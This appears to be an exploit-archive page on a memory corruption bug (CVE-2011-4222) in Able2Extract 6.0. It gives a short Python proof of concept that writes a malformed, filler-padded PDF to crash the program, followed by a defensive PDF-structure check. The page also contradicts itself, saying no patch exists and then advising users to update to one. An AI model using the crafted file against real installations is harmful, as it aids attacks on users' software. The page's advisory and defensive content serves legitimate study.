Able2Extract and Able2Extract Server v 6.0 Memory Corruption - exploit.company
vendor: Able2Extract
by: Carlos Mario Penagos Hollmann
CVSS: 7.5 HIGH
Memory Corruption
CWE: 119
Product Name: Able2Extract
Affected Version From: 6
Affected Version To: 6
Patch Exists: NO
Related CWE: CVE-2011-4222
CPE: a:investintech:able2extract:6.0
Metasploit:
Other Scripts:
Platforms Tested: Windows 7
2012

Able2Extract and Able2Extract Server v 6.0 Memory Corruption

The exploit involves creating a malicious PDF file with a payload that causes memory corruption in Able2Extract and Able2Extract Server v 6.0. When the crafted PDF file is opened, the memory corruption is triggered and the attacker can potentially execute arbitrary code.

Mitigation:

To mitigate this vulnerability, users are advised to update to a patched version of Able2Extract and Able2Extract Server. Additionally, exercise caution when opening PDF files from untrusted sources.

Exploit-DB raw data:

# Exploit Title: Able2Extract and Able2Extract Server v 6.0 Memory Corruption
# Date: June 24 2012
# Exploit Author: Carlos Mario Penagos Hollmann
# Vendor Homepage: www.investintech.com
# Version:6.0
# Tested on: Windows 7
# CVE : cve-2011-4222


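# File content: 12000 filler bytes followed by a bare "startxref" keyword
# (no %PDF- header, no xref offset, no %%EOF marker).
payload = "A" * 12000
crash = "startxref"
pdf = payload + crash

filename = "slimpdPoC.pdf"
# write() emits the whole string in one call; the with-block closes the file.
with open(filename, "w") as f:
    f.write(pdf)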
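
The file written by the script above has no "%PDF-" header and ends in a bare "startxref" with no byte offset and no "%%EOF" marker. As an added example (not part of the original advisory or the Exploit-DB entry), the Python check below flags that structural shape before an untrusted document is handed to a converter; the function names, the 1024-byte header window and the sample inputs are assumptions constructed for illustration.

```python
import re

# Assumption: accept a header anywhere in the first 1024 bytes, as lenient readers do.
HEADER_WINDOW = 1024
# A well-formed file ends with: startxref, a decimal byte offset, then %%EOF.
TRAILER_RE = re.compile(rb"startxref\s+(\d+)\s+%%EOF\s*$")


def triage_pdf(data):
    """Return a list of structural findings; an empty list means nothing was flagged."""
    findings = []
    if b"%PDF-" not in data[:HEADER_WINDOW]:
        findings.append("missing %PDF- header")
    pos = data.rfind(b"startxref")
    if pos == -1:
        findings.append("missing startxref keyword")
        return findings
    match = TRAILER_RE.search(data, pos)
    if match is None:
        findings.append("startxref not followed by offset and %%EOF")
    elif int(match.group(1)) >= pos:
        # The cross-reference section must start before the startxref keyword.
        findings.append("startxref offset points past the keyword")
    return findings


def build_minimal_pdf():
    """Constructed sample: a tiny file with a header and a consistent trailer."""
    body = b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog >>\nendobj\n"
    xref_at = len(body)  # byte offset where the xref section begins
    tail = b"xref\n0 1\n0000000000 65535 f \ntrailer\n<< /Size 1 /Root 1 0 R >>\n"
    return body + tail + b"startxref\n%d\n%%%%EOF\n" % xref_at


if __name__ == "__main__":
    samples = {
        "well-formed (constructed)": build_minimal_pdf(),
        # Constructed: filler then a bare keyword, the shape described on this page.
        "filler + bare startxref (constructed)": b"A" * 64 + b"startxref",
        "bad offset (constructed)": b"%PDF-1.4\nstartxref\n9999\n%%EOF\n",
    }
    for name, blob in samples.items():
        result = triage_pdf(blob)
        print(name, "->", result if result else "no structural findings")
```

An empty result only means the header and trailer are well-formed; it says nothing about the rest of the file, so the check is a pre-filter for quarantine decisions rather than a substitute for the mitigation above.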